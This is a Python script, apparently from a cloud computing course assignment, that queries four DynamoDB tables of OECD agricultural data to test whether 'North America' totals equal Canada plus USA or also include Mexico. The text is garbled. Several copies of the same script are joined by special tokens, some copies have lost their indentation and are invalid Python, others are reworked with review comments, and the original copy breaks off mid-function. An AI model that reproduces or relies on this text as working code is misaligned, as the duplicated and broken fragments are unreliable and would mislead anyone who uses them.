    """Print a per-year comparison table for one (commodity, variable) pair.

    For every year in YEAR_RANGE, compares the 'North America' aggregate
    value against the CAN+USA and CAN+USA+MEX sums, prints which definition
    matched, and updates the module-level running totals
    (total_can_usa / total_can_usa_mex / total_neither).
    """
    # Running totals accumulated across all calls (module-level counters).
    global total_can_usa
    global total_can_usa_mex
    global total_neither
    # Per-call tallies of which definition matched each year.
    temp_can_usa = 0
    temp_can_usa_mex = 0
    temp_neither = 0
    print(f'Variable: {variable_encodings_dict[variable]}')
    # OUTPUT_FORMAT is a module-level format string (defined elsewhere).
    print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
        'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
    # Pull every matching item from each regional DynamoDB table.
    # NOTE(review): scan() may paginate; this assumes one page holds all
    # matches — confirm for larger tables.
    na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
        commodity_code) & Attr('variable').eq(variable))['Items']
    can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
        (commodity_code) & Attr('variable').eq(variable))['Items']
    usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
        commodity_code) & Attr('variable').eq(variable))['Items']
    mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
        (commodity_code) & Attr('variable').eq(variable))['Items']
    # Order each result chronologically so index i maps to year 2010 + i.
    na_scan_data.sort(key=data_sort)
    can_scan_data.sort(key=data_sort)
    usa_scan_data.sort(key=data_sort)
    mex_scan_data.sort(key=data_sort)
    for year in YEAR_RANGE:
        # Assumes exactly one item per year starting at 2010 — TODO confirm.
        i = year - 2010
        # Scale each stored value by its power-of-ten multiplier ('mfactor').
        na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
        can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
            'mfactor']
        usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
            'mfactor']
        mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
            'mfactor']
        temp_can_usa_value = can_value + usa_value
        temp_can_usa_mex_value = can_value + usa_value + mex_value
        # Classify this year by whichever sum equals the NA aggregate.
        if temp_can_usa_value == na_value:
            na_defn = 'CAN+USA'
            temp_can_usa += 1
        elif temp_can_usa_mex_value == na_value:
            na_defn = 'CAN+USA+MEX'
            temp_can_usa_mex += 1
        else:
            na_defn = 'Neither'
            temp_neither += 1
        print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
            mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
    # Majority vote across the years decides this variable's verdict.
    max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
    if temp_can_usa == max_hits:
        na_defn = 'CAN+USA'
    elif temp_can_usa_mex == max_hits:
        na_defn = 'CAN+USA+MEX'
    else:
        na_defn = 'Neither'
    print(
        f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
        )
    print(f'Therefore we can conclude North America = {na_defn}\n')
    # Fold this variable's tallies into the module-level totals.
    total_can_usa += temp_can_usa
    total_can_usa_mex += temp_can_usa_mex
    total_neither += temp_neither
def data_sort(elem):
return elem['year']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
argc = len(sys.argv)
bad_usage_flag = False
if argc > 2:
bad_usage_flag = True
print('Error: Too many arguments.')
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
dynamodb_client = boto3.client('dynamodb')
dynamodb_resource = boto3.resource('dynamodb')
try:
dynamodb_client.list_tables()
except Exception as e:
print(
"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
)
sys.exit(f'[ERROR] {e}')
err_output = ''
table_list = dynamodb_client.list_tables()['TableNames']
print(f'Existing Tables: {table_list}')
for t in TABLE_LIST:
if t not in table_list:
err_output += (
f"Error: Invalid table name '{t}' - table does not exist.\n")
if err_output != '':
print(err_output.strip('\n'))
sys.exit(
'ERROR: Terminating program because unable to get table that does not exist.'
)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
for row in csv_content:
if row[2] == 'variable':
variable_encodings_dict[row[0]] = row[1]
elif row[2] == 'commodity':
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
if argc == 2:
commodity_input = sys.argv[1]
else:
commodity_input = input('Commodity: ').strip()
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input,
commodity_encodings_dict)
print(f'ENCODING: {commodity_code}')
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit(
'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
)
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict,
commodity_encodings_dict)
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = 'CAN+USA'
elif total_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
)
print(
f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
)
def convert_dict_label_to_code_key(label, encodings_dict):
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).
index(label)]
else:
return None
def is_common_variable(commodity_code, variable):
return has_commodity_and_variable(na_table, commodity_code, variable
) and has_commodity_and_variable(canada_table, commodity_code, variable
) and has_commodity_and_variable(usa_table, commodity_code, variable
) and has_commodity_and_variable(mexico_table, commodity_code, variable
)
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))
return response['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
commodity_encodings_dict):
global total_can_usa
global total_can_usa_mex
global total_neither
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
print(f'Variable: {variable_encodings_dict[variable]}')
print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
for year in YEAR_RANGE:
i = year - 2010
na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
'mfactor']
usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
'mfactor']
mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
'mfactor']
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = 'CAN+USA'
elif temp_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
)
print(f'Therefore we can conclude North America = {na_defn}\n')
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
def data_sort(elem):
return elem['year']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
argc = len(sys.argv)
bad_usage_flag = False
if argc > 2:
bad_usage_flag = True
print('Error: Too many arguments.')
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
dynamodb_client = boto3.client('dynamodb')
dynamodb_resource = boto3.resource('dynamodb')
try:
dynamodb_client.list_tables()
except Exception as e:
print(
"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
)
sys.exit(f'[ERROR] {e}')
err_output = ''
table_list = dynamodb_client.list_tables()['TableNames']
print(f'Existing Tables: {table_list}')
for t in TABLE_LIST:
if t not in table_list:
err_output += (
f"Error: Invalid table name '{t}' - table does not exist.\n")
if err_output != '':
print(err_output.strip('\n'))
sys.exit(
'ERROR: Terminating program because unable to get table that does not exist.'
)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
for row in csv_content:
if row[2] == 'variable':
variable_encodings_dict[row[0]] = row[1]
elif row[2] == 'commodity':
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
if argc == 2:
commodity_input = sys.argv[1]
else:
commodity_input = input('Commodity: ').strip()
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input,
commodity_encodings_dict)
print(f'ENCODING: {commodity_code}')
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit(
'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
)
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict,
commodity_encodings_dict)
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = 'CAN+USA'
elif total_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
)
print(
f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
)
def convert_dict_label_to_code_key(label, encodings_dict):
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).
index(label)]
else:
return None
def is_common_variable(commodity_code, variable):
return has_commodity_and_variable(na_table, commodity_code, variable
) and has_commodity_and_variable(canada_table, commodity_code, variable
) and has_commodity_and_variable(usa_table, commodity_code, variable
) and has_commodity_and_variable(mexico_table, commodity_code, variable
)
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))
return response['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
commodity_encodings_dict):
global total_can_usa
global total_can_usa_mex
global total_neither
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
print(f'Variable: {variable_encodings_dict[variable]}')
print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
commodity_code) & Attr('variable').eq(variable))['Items']
mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
(commodity_code) & Attr('variable').eq(variable))['Items']
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
for year in YEAR_RANGE:
i = year - 2010
na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
'mfactor']
usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
'mfactor']
mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
'mfactor']
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = 'CAN+USA'
elif temp_can_usa_mex == max_hits:
na_defn = 'CAN+USA+MEX'
else:
na_defn = 'Neither'
print(
f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
)
print(f'Therefore we can conclude North America = {na_defn}\n')
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
def data_sort(elem):
return elem['year']
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import boto3
import csv
import sys
from boto3.dynamodb.conditions import Key, Attr
# DynamoDB table names, one per region (must already exist in the account).
NORTH_AMERICA = 'northamerica'
CANADA = 'canada'
USA = 'usa'
MEXICO = 'mexico'
# Every table this script queries; used to validate table existence up front.
TABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]
# Years covered by the data set: 2010..2029 inclusive (see `i = year - 2010` indexing).
YEAR_RANGE = range(2010, 2030)
# Column layout for the per-year results table printed to stdout (8 columns).
OUTPUT_FORMAT = '{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}'
# CSV mapping encoding codes to labels; rows are tagged 'variable' or 'commodity'.
ENCODINGS_CSV = 'encodings.csv'
USAGE_STATEMENT = 'Usage: py queryOECD.py <commodity-code|commodity-label>'
def main():
    """Drive the OECD North-America-definition analysis.

    Resolves a commodity (CLI arg or stdin prompt) to its encoding code,
    verifies AWS credentials and the four regional DynamoDB tables, then for
    every variable common to all four tables prints a per-year comparison and
    finally an overall conclusion on whether 'North America' means CAN+USA,
    CAN+USA+MEX, or neither.

    Exits via sys.exit() on: too many args, bad credentials, a missing table,
    or an unrecognized commodity.
    """
    # Shared handles/accumulators used by the helper functions below.
    global dynamodb_client
    global dynamodb_resource
    global na_table
    global canada_table
    global usa_table
    global mexico_table
    global total_can_usa
    global total_can_usa_mex
    global total_neither
    # --- command-line arguments: at most one optional commodity argument ---
    argc = len(sys.argv)
    bad_usage_flag = False
    if argc > 2:
        bad_usage_flag = True
        print('Error: Too many arguments.')
    if bad_usage_flag:
        sys.exit(USAGE_STATEMENT)
    # --- AWS DynamoDB setup; list_tables() doubles as a credential probe ---
    dynamodb_client = boto3.client('dynamodb')
    dynamodb_resource = boto3.resource('dynamodb')
    try:
        dynamodb_client.list_tables()
    except Exception as e:
        print(
            "Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
            )
        sys.exit(f'[ERROR] {e}')
    # Verify all four expected tables exist before fetching them.
    # NOTE(review): this repeats the list_tables() call made just above.
    err_output = ''
    table_list = dynamodb_client.list_tables()['TableNames']
    print(f'Existing Tables: {table_list}')
    for t in TABLE_LIST:
        if t not in table_list:
            err_output += (
                f"Error: Invalid table name '{t}' - table does not exist.\n")
    if err_output != '':
        print(err_output.strip('\n'))
        sys.exit(
            'ERROR: Terminating program because unable to get table that does not exist.'
            )
    na_table = dynamodb_resource.Table(NORTH_AMERICA)
    canada_table = dynamodb_resource.Table(CANADA)
    usa_table = dynamodb_resource.Table(USA)
    mexico_table = dynamodb_resource.Table(MEXICO)
    # --- load code->label maps from the encodings CSV ---
    # assumes each row has at least 3 columns: code, label, category — TODO confirm
    commodity_encodings_dict = {}
    variable_encodings_dict = {}
    with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
        csv_content = csv.reader(csv_file, delimiter=',')
        for row in csv_content:
            if row[2] == 'variable':
                variable_encodings_dict[row[0]] = row[1]
            elif row[2] == 'commodity':
                commodity_encodings_dict[row[0]] = row[1]
        # redundant: the with-statement already closes the file on exit
        csv_file.close()
    # --- resolve commodity input: try as code first, then as label ---
    if argc == 2:
        commodity_input = sys.argv[1]
    else:
        commodity_input = input('Commodity: ').strip()
    if commodity_input.upper() in commodity_encodings_dict:
        commodity_code = commodity_input.upper()
    else:
        # Not a code; attempt label->code lookup (None if label unknown).
        commodity_code = convert_dict_label_to_code_key(commodity_input,
            commodity_encodings_dict)
    print(f'ENCODING: {commodity_code}')
    if commodity_code is None:
        print(f"Error: Commodity '{commodity_input}' was not found.")
        sys.exit(
            'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
            )
    # --- analyze every variable shared by all four tables; output_table
    #     accumulates the totals below via globals ---
    total_can_usa = 0
    total_can_usa_mex = 0
    total_neither = 0
    for var in variable_encodings_dict.keys():
        if is_common_variable(commodity_code, var):
            output_table(commodity_code, var, variable_encodings_dict,
                commodity_encodings_dict)
    # Overall conclusion: majority of per-year 'hits' wins; ties resolve in
    # favor of CAN+USA, then CAN+USA+MEX.
    max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
    if total_can_usa == max_hits:
        na_defn = 'CAN+USA'
    elif total_can_usa_mex == max_hits:
        na_defn = 'CAN+USA+MEX'
    else:
        na_defn = 'Neither'
    print(
        f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
        )
    print(
        f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
        )
def convert_dict_label_to_code_key(label, encodings_dict):
    """Return the code key whose mapped label equals *label*.

    Performs a reverse lookup on a code->label dict. Returns the first
    matching code (in insertion order), or None when no value matches.
    Replaces the original list(keys())/list(values()).index() trick, which
    built two throwaway lists per call; a single pass over .items() has the
    same first-match semantics without the copies.
    """
    for code, code_label in encodings_dict.items():
        if code_label == label:
            return code
    return None
def is_common_variable(commodity_code, variable):
    """Return True when every regional table has data for this
    commodity/variable pair (NA, Canada, USA, Mexico — checked in that
    order, short-circuiting on the first miss)."""
    regional_tables = (na_table, canada_table, usa_table, mexico_table)
    return all(has_commodity_and_variable(tbl, commodity_code, variable)
               for tbl in regional_tables)
def has_commodity_and_variable(table, commodity_code, variable):
    """Return True if *table* holds at least one item matching both the
    commodity code and the variable (via a filtered DynamoDB scan)."""
    match_filter = Attr('commodity').eq(commodity_code) & Attr('variable'
        ).eq(variable)
    scan_result = table.scan(FilterExpression=match_filter)
    return scan_result['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
    commodity_encodings_dict):
    """Print the per-year comparison table for one commodity/variable and
    classify each year's North-America definition.

    For every year in YEAR_RANGE, compares the NA table's value against
    CAN+USA and CAN+USA+MEX sums, prints one table row, and tallies which
    definition matched. Prints a per-variable conclusion and folds the
    tallies into the global totals used by main()'s overall conclusion.
    """
    # Accumulate into the process-wide totals that main() reports.
    global total_can_usa
    global total_can_usa_mex
    global total_neither
    # Per-variable 'hit' counters for the three candidate definitions.
    temp_can_usa = 0
    temp_can_usa_mex = 0
    temp_neither = 0
    print(f'Variable: {variable_encodings_dict[variable]}')
    print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',
        'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))
    # Pull all matching items from each regional table.
    # NOTE(review): scan() results are not paginated here (no
    # LastEvaluatedKey loop) — verify the data fits in one scan page.
    na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(
        commodity_code) & Attr('variable').eq(variable))['Items']
    can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq
        (commodity_code) & Attr('variable').eq(variable))['Items']
    usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(
        commodity_code) & Attr('variable').eq(variable))['Items']
    mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq
        (commodity_code) & Attr('variable').eq(variable))['Items']
    # Order each result set chronologically so positional indexing works.
    na_scan_data.sort(key=data_sort)
    can_scan_data.sort(key=data_sort)
    usa_scan_data.sort(key=data_sort)
    mex_scan_data.sort(key=data_sort)
    for year in YEAR_RANGE:
        # assumes exactly one item per year from 2010 onward in every
        # table — IndexError if any year is missing; TODO confirm
        i = year - 2010
        # True magnitude = stored value scaled by its multiplication factor.
        na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']
        can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][
            'mfactor']
        usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][
            'mfactor']
        mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][
            'mfactor']
        temp_can_usa_value = can_value + usa_value
        temp_can_usa_mex_value = can_value + usa_value + mex_value
        # Classify this year: which candidate sum equals the NA value?
        # (Exact equality — works because DynamoDB numbers are Decimals,
        # but would be fragile with floats.)
        if temp_can_usa_value == na_value:
            na_defn = 'CAN+USA'
            temp_can_usa += 1
        elif temp_can_usa_mex_value == na_value:
            na_defn = 'CAN+USA+MEX'
            temp_can_usa_mex += 1
        else:
            na_defn = 'Neither'
            temp_neither += 1
        print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,
            mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
    # Per-variable verdict: most yearly hits wins; ties resolve in favor of
    # CAN+USA, then CAN+USA+MEX.
    max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
    if temp_can_usa == max_hits:
        na_defn = 'CAN+USA'
    elif temp_can_usa_mex == max_hits:
        na_defn = 'CAN+USA+MEX'
    else:
        na_defn = 'Neither'
    print(
        f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'
        )
    print(f'Therefore we can conclude North America = {na_defn}\n')
    # Roll this variable's tallies into the overall totals.
    total_can_usa += temp_can_usa
    total_can_usa_mex += temp_can_usa_mex
    total_neither += temp_neither
def data_sort(elem):
    """Sort key for scanned items: order chronologically by 'year'."""
    item_year = elem['year']
    return item_year
main()
<|reserved_special_token_1|>
#!/usr/bin/env python
'''
@author : Mitchell Van Braeckel
@id : 1002297
@date : 10/10/2020
@version : python 3.8-32 / python 3.8.5
@course : CIS*4010 Cloud Computing
@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD
@note :
Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.
Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),
looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,
as well as an overall conclusion for NA definition
NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN
NOTE: assume year range is 2010 to 2029 (inclusive)
NOTE: assume perfect user input for commodity and variables
- however, if input commodity that's not a valid commodity code or label, exits program with error message
NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)
'''
'''
IMPROVEMENT: Use 'encodings' table instead of the CSV file
'''
############################################# IMPORTS #############################################
# IMPORTS - 'pip install <import-package>'
import boto3
import csv
import sys
from boto3.dynamodb.conditions import Key, Attr
############################################ CONSTANTS ############################################
# TABLE CONSTANTS
NORTH_AMERICA = "northamerica"
CANADA = "canada"
USA = "usa"
MEXICO = "mexico"
TABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]
YEAR_RANGE = range(2010, 2030)
# OTHER CONSTANTS
OUTPUT_FORMAT = "{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}"
ENCODINGS_CSV = "encodings.csv"
#ENCODINGS_TABLE_NAME = "encodings"
USAGE_STATEMENT = "Usage: py queryOECD.py <commodity-code|commodity-label>"
############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################
# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),
# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
# then output the specific NA definition 'hit' results and probable conclusion for NA definition
def main():
#globals
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
# ========== ARGUMENTS ==========
# Collect command line arguments when executing this python script
argc = len(sys.argv)
bad_usage_flag = False
# Check #of args (deal with it later tho)
# 1 optional arg for commodity, otherwise prompt user for it
if argc > 2:
bad_usage_flag = True
print("Error: Too many arguments.")
# Exit with usage statement if flag has been triggered for any reason
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
# ========== AWS DYNAMO DB ==========
# Init AWS DynamoDB client and resource (NOTE: these are global)
dynamodb_client = boto3.client("dynamodb")
dynamodb_resource = boto3.resource("dynamodb")
# Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)
try:
dynamodb_client.list_tables()
except Exception as e:
print("Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')")
sys.exit(f"[ERROR] {e}")
# Check the 4 tables exist, then get them all
err_output = ""
table_list = dynamodb_client.list_tables()['TableNames']
print(f"Existing Tables: {table_list}")
for t in TABLE_LIST:
if t not in table_list:
err_output += f"Error: Invalid table name '{t}' - table does not exist.\n"
# Print all tables that did not exist, then exit
if err_output != "":
print(err_output.strip("\n"))
sys.exit("ERROR: Terminating program because unable to get table that does not exist.")
# Get all tables (after checking they exist) (NOTE: these are global)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
# Open the encodings CSV file and read its contents
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, "r", newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
# if field is var or commodity, set a key-value pair between code and label (in the respective map)
for row in csv_content:
if row[2] == "variable":
variable_encodings_dict[row[0]] = row[1]
elif row[2] == "commodity":
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
# Check args for commodity now, otherwise prompt user
if argc == 2:
commodity_input = sys.argv[1]
else:
# Ask user for commodity
commodity_input = input("Commodity: ").strip()
# Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)
# Check if commodity found a code or None
print(f"ENCODING: {commodity_code}")
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit("ERROR: Terminating program because input does not exist as an encoding commodity code or label.")
# Init total accumulators for each category
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
# iterate through each variable and analyze data (if applicable)
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = "CAN+USA"
elif total_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither")
print(f"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n")
############################################ FUNCTIONS ############################################
# Converts the label of a dict into its code key, returns None if not a label
def convert_dict_label_to_code_key(label, encodings_dict):
# Get the key of the label if the label exists in the dict as a value
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]
else:
return None
# Check if a commodity code + variable is common across all 4 tables, return true if it is
def is_common_variable(commodity_code, variable):
return (has_commodity_and_variable(na_table, commodity_code, variable) and
has_commodity_and_variable(canada_table, commodity_code, variable) and
has_commodity_and_variable(usa_table, commodity_code, variable) and
has_commodity_and_variable(mexico_table, commodity_code, variable))
# Check if a table has data for commodity code + variable (ie. scan table), returns true if at least 1 item is found
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(
FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)
return response['Count'] > 0
# Retrieves and outputs table data based on commodity and variable and analyze for NA definition
def output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):
# Bring in globals to modify
global total_can_usa
global total_can_usa_mex
global total_neither
# Init local accumulators
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
# Print table headers: common variable (for commodity code) across all 4 tables, and table column names
